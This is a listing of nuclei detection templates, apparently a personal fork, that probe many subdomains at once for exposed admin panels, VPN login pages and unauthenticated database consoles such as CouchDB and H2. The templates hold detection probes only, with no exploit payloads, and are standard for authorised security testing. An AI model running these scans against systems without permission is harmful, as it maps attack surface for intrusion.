23 | - _ctxstxt_CitrixCopyright
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-vpn-detect.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-vpn-detect
2 |
3 | info:
4 | name: Citrix VPN Detection
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /vpn/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Citrix Gateway"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/clave-login-panel.yaml:
--------------------------------------------------------------------------------
# Requests /admin.php and reports a 200 response containing "Clave".
id: clave-login-panel

info:
  name: Clave login panel
  author: __Fazal
  severity: info
  tags: panel,clave

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /admin.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      # NOTE(review): "Clave" is also an ordinary Spanish word, so unrelated
      # Spanish-language admin pages at /admin.php can satisfy this matcher;
      # a product-specific string would make hits more trustworthy.
      - type: word
        words:
          - "Clave"

      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/compal-panel.yaml:
--------------------------------------------------------------------------------
# Requests /common_page/login.html, the login page path this template
# associates with the Compal CH7465LG.
id: compal-panel-detect

info:
  name: Compal CH7465LG panel detect
  author: fabaff
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /common_page/login.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # NOTE(review): the only word is an empty string in this listing --
      # presumably the original was markup that was stripped when the page was
      # rendered. An empty word carries no signal and there is no status
      # matcher, so as written every response would be reported. Restore the
      # string from the original template before relying on results.
      - type: word
        part: body
        words:
          - ""

--------------------------------------------------------------------------------
/Templates/Exposed-Panels/couchdb-exposure.yaml:
--------------------------------------------------------------------------------
# Requests /_all_dbs and reports a 200 whose response headers identify CouchDB.
# A hit means the database listing endpoint answered without credentials being
# sent; the instance should require authentication and not face untrusted
# networks.
id: couchdb-exposure
info:
  name: couchdb exposure
  author: organiccrap
  severity: low
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /_all_dbs HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Matched against response headers, not the body: both product strings
      # must be present (presumably in the Server header -- confirm).
      - type: word
        part: header
        condition: and
        words:
          - CouchDB/
          - Erlang OTP/

--------------------------------------------------------------------------------
/Templates/Exposed-Panels/couchdb-fauxton.yaml:
--------------------------------------------------------------------------------
# Looks for the CouchDB Fauxton web UI on the site root of each candidate Host.
id: couchdb-fauxton

info:
  name: Apache CouchDB Fauxton Exposure
  author: pdteam
  severity: low
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Single word, no status check: any response carrying this string counts.
      - type: word
        words:
          - 'Project Fauxton'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/crxde-lite.yaml:
--------------------------------------------------------------------------------
# Detects the CRXDE Lite page at /crx/de/index.jsp for each candidate Host.
id: crxde-lite

info:
  name: CRXDE Lite
  author: nadino
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /crx/de/index.jsp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Word-only match; the response status is not checked.
      - type: word
        words:
          - "CRXDE Lite"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cx-cloud-login-1.yaml:
--------------------------------------------------------------------------------
# Detects a CX Cloud login page on the site root (variant 1 of 2; the sibling
# template probes /cxcum/ instead).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it, since template ids are normally dash-separated tokens.
id: cx-cloud-login 1

info:
  name: CX Cloud
  author: dhiyaneshDk
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "CX Cloud"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cx-cloud-login-2.yaml:
--------------------------------------------------------------------------------
# Detects a CX Cloud login page under /cxcum/ (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: cx-cloud-login 2

info:
  name: CX Cloud
  author: dhiyaneshDk
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /cxcum/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "CX Cloud"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/django-admin-panel.yaml:
--------------------------------------------------------------------------------
# Detects the Django admin login form at /admin/login/?next=/admin/.
id: django-admin-panel

info:
  name: Python Django Admin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /admin/login/?next=/admin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Django administration"
        # With a single word in the list, `condition: and` changes nothing.
        condition: and
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/dotcms-admin-panel.yaml:
--------------------------------------------------------------------------------
# Detects the dotCMS admin entry point at /dotAdmin/.
id: dotcms-admin-panel

info:
  name: dotAdmin Panel
  author: impramodsargar
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /dotAdmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    # Only one matcher follows, so `and` has nothing to combine; a status
    # matcher may have been intended here — TODO confirm.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'dotCMS Content Management Platform'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/druid-console-exposure.yaml:
--------------------------------------------------------------------------------
# Detects an Alibaba Druid console served from the site root.
id: druid-console-exposure

info:
  name: Alibaba Druid Console Exposure
  author: pdteam
  severity: medium
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Both asset references must be present, which keeps the match specific
      # to pages that load /druid.js and /druid.css from the root.
      - type: word
        words:
          - 'src="/druid.js"'
          - 'href="/druid.css"'
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ems-login-panel.yaml:
--------------------------------------------------------------------------------
# Detects the EMS Web Client login page at /EMSWebClient/Login.aspx.
# A hit requires a 200 status AND the login-page title string.
id: ems-login-panel

info:
  name: EMS Login page detection
  author: __Fazal
  severity: info
  tags: panel,ems

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /EMSWebClient/Login.aspx HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "EMS Web Client - Login"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/entrust-identityguard-1.yaml:
--------------------------------------------------------------------------------
# Detects Entrust IdentityGuard Self-Service by a string in the page body
# (variant 1 of 2; the sibling template fingerprints the favicon instead).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: identityguard-selfservice-entrust 1

info:
  name: IdentityGuard Self-Service by Entrust
  author: nodauf
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /IdentityGuardSelfService/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # DSL form of a plain substring test on the response body.
      - type: dsl
        dsl:
          - "contains(body,'IdentityGuard Self-Service')"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/entrust-identityguard-2.yaml:
--------------------------------------------------------------------------------
# Detects Entrust IdentityGuard Self-Service by fingerprinting its favicon
# (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: identityguard-selfservice-entrust 2

info:
  name: IdentityGuard Self-Service by Entrust
  author: nodauf
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /IdentityGuardSelfService/images/favicon.ico HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # Compares the MurmurHash3 of the base64-encoded body with one fixed
      # value. An exact-hash match is precise but brittle: a product release
      # that ships a different icon will no longer be detected.
      - type: dsl
        dsl:
          - "(\"-1060264737\" == mmh3(base64_py(body)))"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/exposed-pagespeed-global-admin.yaml:
--------------------------------------------------------------------------------
# Detects the PageSpeed global admin dashboard at /pagespeed_admin/.
id: exposed-pagespeed-global-admin

info:
  name: Apache PageSpeed Global Admin Dashboard Exposure
  author: pdteam
  severity: medium
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /pagespeed_admin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Word-only match; status is not checked, so confirm hits by hand.
      - type: word
        words:
          - "Pagespeed Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/exposed-webalizer.yaml:
--------------------------------------------------------------------------------
# Detects a publicly reachable Webalizer statistics page at /webalizer/.
id: exposed-webalizer

info:
  name: Publicly exposed Webalizer Interface
  author: pdteam
  severity: low
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /webalizer/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Both strings are required, so a page that merely mentions Webalizer
      # does not match.
      - type: word
        words:
          - "Webalizer Version"
          - "Usage statistics for"
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/flink-exposure.yaml:
--------------------------------------------------------------------------------
# Detects the Apache Flink web dashboard on the site root.
id: flink-exposure

info:
  name: Apache Flink Exposure
  author: pdteam
  severity: low
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - 'Apache Flink Web Dashboard'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/fortinet-fortigate-panel.yaml:
--------------------------------------------------------------------------------
# Detects the FortiGate SSL VPN login page at /remote/login.
id: fortinet-fortigate-panel

info:
  name: Fortinet FortiGate SSL VPN Panel
  author: bsysop
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /remote/login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Keys on a resource path referenced from the login page body rather
      # than on a visible title.
      - type: word
        words:
          - "/remote/fgt_lang"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/github-enterprise-detect.yaml:
--------------------------------------------------------------------------------
# Detects a GitHub Enterprise sign-in page at /login.
id: github-enterprise-detect

info:
  name: Detect Github Enterprise
  author: ehsahil
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # The separator is a non-ASCII middle dot; keep this file UTF-8 encoded
      # or the word will stop matching.
      - type: word
        words:
          - "GitHub · Enterprise"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/gitlab-detect.yaml:
--------------------------------------------------------------------------------
# Detects a GitLab sign-in page at /users/sign_in.
# A hit requires the word matcher AND a 200 status.
id: gitlab-detect

info:
  name: Detect Gitlab
  author: ehsahil
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      # No `condition` is set on the word list, so either string is enough
      # (nuclei's default within a matcher is `or`). 'GitLab' alone is a broad
      # marker; expect some unrelated pages to match.
      - type: word
        words:
          - 'GitLab'
          - 'https://about.gitlab.com'

      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/globalprotect-panel-1.yaml:
--------------------------------------------------------------------------------
# Detects a Palo Alto GlobalProtect portal at /global-protect/login.esp
# (variant 1 of 2; the sibling template probes /sslmgr).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: globalprotect-panel 1

info:
  name: PaloAlto Networks GlobalProtect Panel
  author: organiccrap
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /global-protect/login.esp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Either string suffices. "Invalid parameters" is generic wording, so a
      # hit on that word alone should be confirmed manually.
      - type: word
        words:
          - "GlobalProtect Portal"
          - "Invalid parameters"
        condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/globalprotect-panel-2.yaml:
--------------------------------------------------------------------------------
# Detects a Palo Alto GlobalProtect portal via the /sslmgr endpoint
# (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: globalprotect-panel 2

info:
  name: PaloAlto Networks GlobalProtect Panel
  author: organiccrap
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /sslmgr HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Either string suffices; "Invalid parameters" on its own is a weak
      # signal because the wording is not product-specific.
      - type: word
        words:
          - "GlobalProtect Portal"
          - "Invalid parameters"
        condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/glpi-login-1.yaml:
--------------------------------------------------------------------------------
# Detects a GLPI login page on the site root (variant 1 of 2; the sibling
# template probes /glpi/).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: glpi-login 1

info:
  name: GLPI - Аутентификация
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/7002
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Both words are required, and the first is the Russian-language page
      # title, so instances served in another language will not match.
      - type: word
        words:
          - 'GLPI - Аутентификация'
          - 'GLPI Copyright'
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/glpi-login-2.yaml:
--------------------------------------------------------------------------------
# Detects a GLPI login page under /glpi/ (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: glpi-login 2

info:
  name: GLPI - Аутентификация
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/7002
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /glpi/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Requires the Russian-language title together with the copyright
      # string; other locales of the same login page are not covered.
      - type: word
        words:
          - 'GLPI - Аутентификация'
          - 'GLPI Copyright'
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/go-anywhere-client.yaml:
--------------------------------------------------------------------------------
# Detects the GoAnywhere web client login page at /webclient/Login.xhtml.
id: go-anywhere-client

info:
  name: GoAnywhere client login detection
  author: iamthefrogy
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /webclient/Login.xhtml HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Either branding string is accepted.
      - type: word
        words:
          - "Powered by GoAnywhere"
          - "GoAnywhere.com"
        condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grafana-detect.yaml:
--------------------------------------------------------------------------------
# Detects a Grafana login page at /login.
id: grafana-detect

info:
  name: Grafana panel detect
  author: organiccrap
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # A single product name anywhere in the body, with no status check:
      # specific enough for triage, not for a confirmed finding.
      - type: word
        words:
          - "Grafana"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grails-database-admin-console-1.yaml:
--------------------------------------------------------------------------------
# Detects an H2 database console exposed by a Grails application at
# /dbconsole/ (variant 1 of 2; the sibling template probes /h2-console/).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: grails-database-admin-console 1

info:
  name: Grails database admin console
  author: emadshanab
  severity: medium
  tags: grails,panel
  reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /dbconsole/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Matches on the console's title string only; status is not checked.
      - type: word
        words:
          - "H2 Console"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grails-database-admin-console-2.yaml:
--------------------------------------------------------------------------------
# Detects an H2 database console at /h2-console/ (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: grails-database-admin-console 2

info:
  name: Grails database admin console
  author: emadshanab
  severity: medium
  tags: grails,panel
  reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /h2-console/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Matches on the console's title string only; status is not checked.
      - type: word
        words:
          - "H2 Console"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hadoop-exposure.yaml:
--------------------------------------------------------------------------------
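# Detects the Hadoop NameNode health page at /dfshealth.html.
id: hadoop-exposure

info:
  name: Apache Hadoop Exposure
  author: pdteam
  severity: low
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /dfshealth.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          # The quoted word was split across two lines, leaving a stray line
          # break inside the scalar; it is normalised to one line here.
          # NOTE(review): markup around the word appears to have been lost, so
          # the marker is broader than probably intended; tighten it once the
          # original string is recovered.
          - 'Hadoop'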
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hivemanager-login-panel.yaml:
--------------------------------------------------------------------------------
# Detects the HiveManager login page at /hm/login.action.
# A hit requires the title string AND a 200 status.
id: hivemanager-login-panel
info:
  name: HiveManager Login panel
  author: binaryfigments
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /hm/login.action HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "HiveManager Login"
      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hmc-hybris-panel-1.yaml:
--------------------------------------------------------------------------------
# Detects the SAP Hybris Management Console at /hmc/hybris (variant 1 of 2;
# the sibling template probes /hybris/hmc/hybris).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: hmc-hybris-panel 1

info:
  name: SAP Hybris Management Console
  author: dogasantos
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /hmc/hybris HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "hybris Management Console"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hmc-hybris-panel-2.yaml:
--------------------------------------------------------------------------------
# Detects the SAP Hybris Management Console at /hybris/hmc/hybris
# (variant 2 of 2).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: hmc-hybris-panel 2

info:
  name: SAP Hybris Management Console
  author: dogasantos
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /hybris/hmc/hybris HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "hybris Management Console"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/identityguard-selfservice-entrust.yaml:
--------------------------------------------------------------------------------
# Detects Entrust IdentityGuard Self-Service at /IdentityGuardSelfService/
# using a plain word matcher.
# NOTE(review): entrust-identityguard-1.yaml in this directory requests the
# same path and tests for the same string through a DSL matcher, so the two
# templates are expected to report the same hosts; consider keeping only one.
id: identityguard-selfservice-entrust

info:
  name: IdentityGuard Self-Service by Entrust
  author: nodauf
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /IdentityGuardSelfService/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "IdentityGuard Self-Service"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jenkins-login.yaml:
--------------------------------------------------------------------------------
# Detects a Jenkins sign-in page at /login.
# A hit requires the page title string AND a 200 status.
id: jenkins-login

info:
  name: Jenkins Login
  author: pdteam
  severity: info
  tags: panel,jenkins

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      # Literal substring, brackets included; this is not a regex.
      - type: word
        words:
          - 'Sign in [Jenkins]'
      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jfrog.yaml:
--------------------------------------------------------------------------------
# Detects a JFrog login page at /ui/login/.
# A hit requires the product name in the response AND a 200 status.
id: jfrog-login

info:
  name: JFrog Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6797
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /ui/login/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'JFrog'
      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jira-detect-1.yaml:
--------------------------------------------------------------------------------
# Detects Jira via /secure/Dashboard.jsp (variant 1 of 3; the siblings probe
# /jira/secure/Dashboard.jspa and /login.jsp).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: jira-detect 1

info:
  name: Detect Jira Issue Management Software
  author: pdteam,philippedelteil
  severity: info
  tags: panel,jira

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /secure/Dashboard.jsp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # The phrase does not name the product, and status is not checked, so
      # other project-management tools could match; verify hits.
      - type: word
        words:
          - "Project Management Software"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jira-detect-2.yaml:
--------------------------------------------------------------------------------
# Detects Jira via /jira/secure/Dashboard.jspa (variant 2 of 3).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: jira-detect 2

info:
  name: Detect Jira Issue Management Software
  author: pdteam,philippedelteil
  severity: info
  tags: panel,jira

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /jira/secure/Dashboard.jspa HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Generic phrase with no status check; verify hits.
      - type: word
        words:
          - "Project Management Software"
--------------------------------------------------------------------------------
